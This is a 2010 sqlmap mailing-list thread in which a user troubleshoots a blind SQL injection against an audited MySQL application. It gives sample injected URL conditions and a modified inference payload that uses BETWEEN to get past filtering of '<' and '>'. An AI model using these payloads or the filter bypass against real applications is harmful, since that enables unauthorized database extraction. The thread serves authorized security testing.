Re: [sqlmap-users] blind sql injection problem
From: velky b. <vel...@gm...> - 2010-02-23 10:30:48
OK, I have resolved the problem. Just some brief info for other users:
If characters like '<' or '>' are filtered, it is possible to modify the query
like this:
<inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
vb
On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote:
> Hello,
> I have found a blind SQL injection in the GET parameter of an audited MySQL
> application (sqlmap is also able to identify the injection), but it is not
> possible to dump any data (like --current-user or --current-db). The only
> option which is working is --fingerprint (it gives the correct MySQL 5
> version); all other options gave the same result, "None".
> Because it looked strange to me, I made some basic tests manually, with the
> following results:
>
>
> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
>
> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
>
> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
>
> As you can see from these results, it looks like the characters "<" and ">"
> are filtered within the application.
>
> However, the injection is still working. I suppose that sqlmap uses these
> characters ("<", ">") really often while dumping data from the database.
> So I have changed the following line in the mysql section of the queries.xml file:
>
> original line:
> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
>
> updated line:
> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>
> Unfortunately, the result was the same (None). What else should be modified?
>
> Is it possible to use a BETWEEN statement instead of ">" in the current
> version of sqlmap?
> Is it already supported somehow in sqlmap, or would it appear in future
> versions?
>
> Thank you in advance
>
> vb
>
>